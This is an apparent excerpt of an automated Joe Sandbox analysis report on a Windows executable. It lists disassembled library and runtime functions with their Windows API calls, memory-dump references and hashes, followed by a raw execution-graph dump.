                                                                            • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                            • API String ID: 4190037839-2401316094
                                                                            • Opcode ID: 60a9e4a616bde9d3650d5374f7b0e792bef98a6345d6610fa7bc99ac1ec5f133
                                                                            • Instruction ID: 4848c3cc747176469ce0ef08a48ea257d9f62360c4c8e5a9f2e1a14c28c6fa3b
                                                                            • Opcode Fuzzy Hash: 60a9e4a616bde9d3650d5374f7b0e792bef98a6345d6610fa7bc99ac1ec5f133
                                                                            • Instruction Fuzzy Hash: C3217370E04209ABDB10EBB5CD51B9F77A8EB44304F60857BA500F72C1DB7CAA05879E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00403A97 Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                            • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                            • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                            • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                            • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                            • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                            • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                            • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                            • String ID:
                                                                            • API String ID: 1694776339-0
                                                                            • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                            • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                            • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                            • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405314 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,0040555C,?,?,?,?,00000000,00000000,00000000,?,0040653B,00000000,0040654E), ref: 0040532E
                                                                              • Part of subcall function 0040515C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,00405227,?,00000000,00405306), ref: 0040517A
                                                                              • Part of subcall function 004051A8: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004053AA,?,?,?,00000000,0040555C), ref: 004051BB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: InfoLocale$DefaultSystem
                                                                            • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                            • API String ID: 1044490935-665933166
                                                                            • Opcode ID: 161572950381ad7cbc257d6fe5eb76d638651fb1e2415ab537dea70fc89fa197
                                                                            • Instruction ID: f22f4b18e1885e1925b87b286fa486de3d96a381b4aec2b7527aff107c54c5fa
                                                                            • Opcode Fuzzy Hash: 161572950381ad7cbc257d6fe5eb76d638651fb1e2415ab537dea70fc89fa197
                                                                            • Instruction Fuzzy Hash: 8E514234B00648ABDB00EBA59C91B9F776ADB89304F50957BB514BB3C6CA3DCA058B5C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004019DC Relevance: 9.1, APIs: 6, Instructions: 59COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                            • LocalFree.KERNEL32(004D07C0,00000000,00401AB4), ref: 00401A1B
                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,004D07C0,00000000,00401AB4), ref: 00401A3A
                                                                            • LocalFree.KERNEL32(004D17C0,?,00000000,00008000,004D07C0,00000000,00401AB4), ref: 00401A79
                                                                            • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                            • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                            • String ID:
                                                                            • API String ID: 3782394904-0
                                                                            • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                            • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                            • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                            • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00403D02 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 72windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                            • ExitProcess.KERNEL32 ref: 00403DE5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ExitMessageProcess
                                                                            • String ID: Error$Runtime error at 00000000$9@
                                                                            • API String ID: 1220098344-1503883590
                                                                            • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                            • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                            • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                            • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004036B8 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                            • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                            • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$AllocString
                                                                            • String ID:
                                                                            • API String ID: 262959230-0
                                                                            • Opcode ID: e5c78b39f57021be2b84baee447ab27339ef0409ceaef8bd5dd3a85dcd2f6a98
                                                                            • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                            • Opcode Fuzzy Hash: e5c78b39f57021be2b84baee447ab27339ef0409ceaef8bd5dd3a85dcd2f6a98
                                                                            • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004030DC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(00000000,00409B3A), ref: 004030E3
                                                                            • GetCommandLineA.KERNEL32(00000000,00409B3A), ref: 004030EE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CommandHandleLineModule
                                                                            • String ID: 8&K$U1hd.@
                                                                            • API String ID: 2123368496-1573593940
                                                                            • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                            • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                            • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                            • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401918 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                            • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                            • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                            • String ID:
                                                                            • API String ID: 730355536-0
                                                                            • Opcode ID: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                            • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                            • Opcode Fuzzy Hash: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                            • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004093FC Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A0FF,000000FA,00000032,0040A166), ref: 0040941B
                                                                            • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A0FF,000000FA,00000032,0040A166), ref: 0040942B
                                                                            • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A0FF,000000FA,00000032,0040A166), ref: 0040943E
                                                                            • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A0FF,000000FA,00000032,0040A166), ref: 00409448
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastSleep
                                                                            • String ID:
                                                                            • API String ID: 1458359878-0
                                                                            • Opcode ID: fb2155ff6e4859bec8591c3fde2b363a3ebb44483e144ae34e4cc697df15f474
                                                                            • Instruction ID: 2c3041558bff2c9731999a3fdaa5bf7f611e1c5313eca5e15d372d414c244bd5
                                                                            • Opcode Fuzzy Hash: fb2155ff6e4859bec8591c3fde2b363a3ebb44483e144ae34e4cc697df15f474
                                                                            • Instruction Fuzzy Hash: 32F0B472A0811457CB34B5EF9981A6F638DEAD1368751813BF904F3383D578CD0392AD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Execution Graph

                                                                            Execution Coverage:16%
                                                                            Dynamic/Decrypted Code Coverage:0.8%
                                                                            Signature Coverage:5.5%
                                                                            Total number of Nodes:2000
                                                                            Total number of Limit Nodes:94
                                                                            execution_graph 49226 402584 49227 402598 49226->49227 49228 4025ab 49226->49228 49256 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 49227->49256 49229 4025c2 RtlEnterCriticalSection 49228->49229 49230 4025cc 49228->49230 49229->49230 49242 4023b4 13 API calls 49230->49242 49233 40259d 49233->49228 49236 4025a1 49233->49236 49234 4025d9 49238 402635 49234->49238 49239 40262b RtlLeaveCriticalSection 49234->49239 49235 4025d5 49235->49234 49243 402088 49235->49243 49239->49238 49240 4025e5 49240->49234 49257 402210 9 API calls 49240->49257 49242->49235 49244 40209c 49243->49244 49245 4020af 49243->49245 49264 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 49244->49264 49247 4020c6 RtlEnterCriticalSection 49245->49247 49250 4020d0 49245->49250 49247->49250 49248 4020a1 49248->49245 49249 4020a5 49248->49249 49252 402106 49249->49252 49250->49252 49258 401f94 49250->49258 49252->49240 49254 4021f1 RtlLeaveCriticalSection 49255 4021fb 49254->49255 49255->49240 49256->49233 49257->49234 49261 401fa4 49258->49261 49259 401fd0 49263 401ff4 49259->49263 49270 401db4 49259->49270 49261->49259 49261->49263 49265 401f0c 49261->49265 49263->49254 49263->49255 49264->49248 49274 40178c 49265->49274 49268 401f29 49268->49261 49271 401e02 49270->49271 49272 401dd2 49270->49272 49271->49272 49297 401d1c 49271->49297 49272->49263 49278 4017a8 49274->49278 49276 4017b2 49293 401678 VirtualAlloc 49276->49293 49278->49276 49279 40180f 49278->49279 49282 401803 49278->49282 49285 4014e4 49278->49285 49294 4013e0 LocalAlloc 49278->49294 49279->49268 49284 401e80 9 API calls 49279->49284 49281 4017be 49281->49279 49295 4015c0 VirtualFree 49282->49295 49284->49268 49286 4014f3 VirtualAlloc 49285->49286 49288 401520 49286->49288 49289 401543 49286->49289 49296 401398 LocalAlloc 49288->49296 49289->49278 49291 40152c 49291->49289 49292 401530 VirtualFree 49291->49292 49292->49289 49293->49281 49294->49278 49295->49279 49296->49291 49298 401d2e 49297->49298 49299 401d51 49298->49299 49300 401d63 49298->49300 49310 401940 49299->49310 49302 401940 3 API calls 49300->49302 49303 401d61 49302->49303 49309 401d79 49303->49309 49320 401bf8 9 API calls 49303->49320 49305 401d88 49306 401da2 49305->49306 49321 401c4c 9 API calls 49305->49321 49322 401454 LocalAlloc 49306->49322 49309->49272 49311 401966 49310->49311 49312 4019bf 49310->49312 49323 40170c 49311->49323 49312->49303 49316 401983 49317 40199a 49316->49317 49328 4015c0 VirtualFree 49316->49328 49317->49312 49329 401454 LocalAlloc 49317->49329 49320->49305 49321->49306 49322->49309 49326 401743 49323->49326 49324 401783 49327 4013e0 LocalAlloc 49324->49327 49325 40175d VirtualFree 49325->49326 49326->49324 49326->49325 49327->49316 49328->49317 49329->49312 49330 41edc4 49331 41edd3 IsWindowVisible 49330->49331 49332 41ee09 49330->49332 49331->49332 49333 41eddd IsWindowEnabled 49331->49333 49333->49332 49334 41ede7 49333->49334 49337 402648 49334->49337 49336 41edf1 EnableWindow 49336->49332 49338 40264c 49337->49338 49339 402656 49337->49339 49338->49339 49341 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49338->49341 49339->49336 49339->49339 49341->49339 49342 42e24b SetErrorMode 49343 41fac8 49344 41fad1 49343->49344 49347 41fd6c 49344->49347 49346 41fade 49348 41fe5e 49347->49348 49349 41fd83 49347->49349 49348->49346 49349->49348 49368 41f92c GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 49349->49368 49351 41fdb9 49352 41fde3 49351->49352 49353 41fdbd 49351->49353 49378 41f92c GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 49352->49378 49369 41fb0c 49353->49369 49357 41fdf1 49359 41fdf5 49357->49359 49360 41fe1b 49357->49360 49358 41fb0c 10 API calls 49362 41fde1 49358->49362 49363 41fb0c 10 API calls 49359->49363 49361 41fb0c 10 API calls 49360->49361 49364 41fe2d 49361->49364 49362->49346 49365 41fe07 49363->49365 49367 41fb0c 10 API calls 49364->49367 49366 41fb0c 10 API calls 49365->49366 49366->49362 49367->49362 49368->49351 49370 41fb27 49369->49370 49371 41fb3d 49370->49371 49372 41f8ac 4 API calls 49370->49372 49379 41f8ac 49371->49379 49372->49371 49374 41fb85 49375 41fba8 SetScrollInfo 49374->49375 49387 41fa0c 49375->49387 49378->49357 49398 418150 49379->49398 49381 41f8c9 GetWindowLongA 49382 41f906 49381->49382 49383 41f8e6 49381->49383 49401 41f838 GetWindowLongA GetSystemMetrics GetSystemMetrics 49382->49401 49400 41f838 GetWindowLongA GetSystemMetrics GetSystemMetrics 49383->49400 49386 41f8f2 49386->49374 49388 41fa1a 49387->49388 49389 41fa22 49387->49389 49388->49358 49390 41fa61 49389->49390 49391 41fa51 49389->49391 49397 41fa5f 49389->49397 49403 417db8 IsWindowVisible ScrollWindow SetWindowPos 49390->49403 49402 417db8 IsWindowVisible ScrollWindow SetWindowPos 49391->49402 49392 41faa1 GetScrollPos 49392->49388 49395 41faac 49392->49395 49396 41fabb SetScrollPos 49395->49396 49396->49388 49397->49392 49399 41815a 49398->49399 49399->49381 49400->49386 49401->49386 49402->49397 49403->49397 49404 420508 49405 42051b 49404->49405 49425 415aa0 49405->49425 49407 420662 49408 420679 49407->49408 49432 414644 KiUserCallbackDispatcher 49407->49432 49409 420690 49408->49409 49433 414688 KiUserCallbackDispatcher 49408->49433 49417 4206b2 49409->49417 49434 41ffd0 12 API calls 49409->49434 49410 4205c1 49430 4207b8 20 API calls 49410->49430 49415 420556 49415->49407 49415->49410 49418 4205b2 MulDiv 49415->49418 49416 4205da 49416->49407 49431 41ffd0 12 API calls 49416->49431 49429 41a274 LocalAlloc TlsSetValue TlsGetValue TlsGetValue DeleteObject 49418->49429 49421 4205f7 49422 420613 MulDiv 49421->49422 49423 420636 49421->49423 49422->49423 49423->49407 49424 42063f MulDiv 49423->49424 49424->49407 49426 415ab2 49425->49426 49435 4143e0 49426->49435 49428 415aca 49428->49415 49429->49410 49430->49416 49431->49421 49432->49408 49433->49409 49434->49417 49436 4143fa 49435->49436 49439 4105b8 49436->49439 49438 414410 49438->49428 49442 40de04 49439->49442 49441 4105be 49441->49438 49443 40de66 49442->49443 49444 40de17 49442->49444 49449 40de74 49443->49449 49447 40de74 19 API calls 49444->49447 49448 40de41 49447->49448 49448->49441 49450 40de84 49449->49450 49452 40de9a 49450->49452 49461 40d740 49450->49461 49481 40e1fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 49450->49481 49464 40e0ac 49452->49464 49455 40d740 5 API calls 49456 40dea2 49455->49456 49456->49455 49457 40df0e 49456->49457 49467 40dcc0 49456->49467 49458 40e0ac 5 API calls 49457->49458 49460 40de70 49458->49460 49460->49441 49482 40eb68 49461->49482 49490 40d61c 49464->49490 49499 40e0b4 49467->49499 49472 40eacc 5 API calls 49473 40dd09 49472->49473 49474 40dd24 49473->49474 49475 40dd1b 49473->49475 49480 40dd21 49473->49480 49515 40db38 49474->49515 49518 40dc28 19 API calls 49475->49518 49519 403420 49480->49519 49481->49450 49485 40d8e0 49482->49485 49487 40d8eb 49485->49487 49486 40d74a 49486->49450 49487->49486 49489 40d92c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 49487->49489 49489->49487 49491 40eb68 5 API calls 49490->49491 49492 40d629 49491->49492 49493 40d63c 49492->49493 49497 40ec6c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 49492->49497 49493->49456 49495 40d637 49498 40d5b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 49495->49498 49497->49495 49498->49493 49523 40d8c4 49499->49523 49502 40dcf3 49506 40eacc 49502->49506 49503 40eb68 5 API calls 49504 40e0d8 49503->49504 49504->49502 49526 40e038 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 49504->49526 49507 40d8e0 5 API calls 49506->49507 49508 40eae1 49507->49508 49527 4034e0 49508->49527 49512 40eaf6 49513 40d8e0 5 API calls 49512->49513 49514 40dcfe 49513->49514 49514->49472 49549 40acdc 19 API calls 49515->49549 49517 40db60 49517->49480 49518->49480 49521 403426 49519->49521 49520 40344b 49520->49456 49521->49520 49522 402660 4 API calls 49521->49522 49522->49521 49524 40eb68 5 API calls 49523->49524 49525 40d8ce 49524->49525 49525->49502 49525->49503 49526->49502 49536 4034bc 49527->49536 49529 4034f0 49541 403400 49529->49541 49532 403744 49533 40374a 49532->49533 49535 40375b 49532->49535 49534 4034bc 4 API calls 49533->49534 49533->49535 49534->49535 49535->49512 49537 4034c0 49536->49537 49538 4034dc 49536->49538 49539 402648 4 API calls 49537->49539 49538->49529 49540 4034c9 49539->49540 49540->49529 49542 403406 49541->49542 49543 40341f 49541->49543 49542->49543 49545 402660 49542->49545 49543->49532 49546 402664 49545->49546 49547 40266e 49545->49547 49546->49547 49548 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49546->49548 49547->49543 49547->49547 49548->49547 49549->49517 49550 47b009 49555 45048c 49550->49555 49552 47b01d 49565 47a160 49552->49565 49554 47b041 49556 450499 49555->49556 49558 4504ed 49556->49558 49574 408b74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49556->49574 49571 45034c 49558->49571 49562 450515 49563 450558 49562->49563 49576 408b74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49562->49576 49563->49552 49581 40b528 49565->49581 49567 47a182 49568 47a1cd 49567->49568 49585 406944 49567->49585 49588 471c8c 49567->49588 49568->49554 49577 4502f8 49571->49577 49574->49558 49575 408b74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49575->49562 49576->49563 49578 45031b 49577->49578 49579 45030a 49577->49579 49578->49562 49578->49575 49580 45030f InterlockedExchange 49579->49580 49580->49578 49582 40b533 49581->49582 49583 40b553 49582->49583 49604 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49582->49604 49583->49567 49586 402648 4 API calls 49585->49586 49587 40694f 49586->49587 49587->49567 49600 471cbd 49588->49600 49601 471d06 49588->49601 49589 471d51 49605 45071c 49589->49605 49592 471d68 49594 403420 4 API calls 49592->49594 49593 4038a4 4 API calls 49593->49601 49595 471d82 49594->49595 49595->49567 49596 403744 4 API calls 49596->49600 49598 403744 4 API calls 49598->49601 49599 403450 4 API calls 49599->49601 49600->49596 49600->49601 49602 45071c 23 API calls 49600->49602 49613 4038a4 49600->49613 49622 403450 49600->49622 49601->49589 49601->49593 49601->49598 49601->49599 49603 45071c 23 API calls 49601->49603 49602->49600 49603->49601 49604->49583 49606 450737 49605->49606 49607 45072c 49605->49607 49639 4506c0 21 API calls 49606->49639 49628 45bf90 49607->49628 49609 450742 49611 450735 49609->49611 49640 408b74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49609->49640 49611->49592 49614 4038b1 49613->49614 49621 4038e1 49613->49621 49616 4038da 49614->49616 49618 4038bd 49614->49618 49615 403400 4 API calls 49617 4038cb 49615->49617 49619 4034bc 4 API calls 49616->49619 49617->49600 49647 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49618->49647 49619->49621 49621->49615 49623 403454 49622->49623 49626 403464 49622->49626 49625 4034bc 4 API calls 49623->49625 49623->49626 49624 403490 49624->49600 49625->49626 49626->49624 49627 402660 4 API calls 49626->49627 49627->49624 49629 45bfa5 49628->49629 49631 45bfb4 49629->49631 49644 45bea8 19 API calls 49629->49644 49632 45bfee 49631->49632 49645 45bea8 19 API calls 49631->49645 49634 45c002 49632->49634 49646 45bea8 19 API calls 49632->49646 49638 45c02e 49634->49638 49641 45bf38 49634->49641 49638->49611 49639->49609 49640->49611 49642 45bf47 VirtualFree 49641->49642 49643 45bf59 VirtualAlloc 49641->49643 49642->49643 49643->49638 49644->49631 49645->49632 49646->49634 49647->49617 49648 40cd94 49651 406e78 WriteFile 49648->49651 49652 406e95 49651->49652 49653 42ed54 49654 42ed63 NtdllDefWindowProc_A 49653->49654 49655 42ed5f 49653->49655 49654->49655 49656 422254 49657 422263 49656->49657 49662 4211e4 49657->49662 49660 422283 49663 421253 49662->49663 49675 4211f3 49662->49675 49666 421264 49663->49666 49687 412440 GetMenuItemCount GetMenuStringA GetMenuState 49663->49687 49665 421292 49668 421305 49665->49668 49673 4212ad 49665->49673 49666->49665 49667 42132a 49666->49667 49670 42133e SetMenu 49667->49670 49684 421303 49667->49684 49676 421319 49668->49676 49668->49684 49669 421356 49690 42112c 10 API calls 49669->49690 49670->49684 49679 4212d0 GetMenu 49673->49679 49673->49684 49674 42135d 49674->49660 49685 422158 10 API calls 49674->49685 49675->49663 49686 408c94 19 API calls 49675->49686 49678 421322 SetMenu 49676->49678 49678->49684 49680 4212f3 49679->49680 49681 4212da 49679->49681 49688 412440 GetMenuItemCount GetMenuStringA GetMenuState 49680->49688 49683 4212ed SetMenu 49681->49683 49683->49680 49684->49669 49689 421d9c 11 API calls 49684->49689 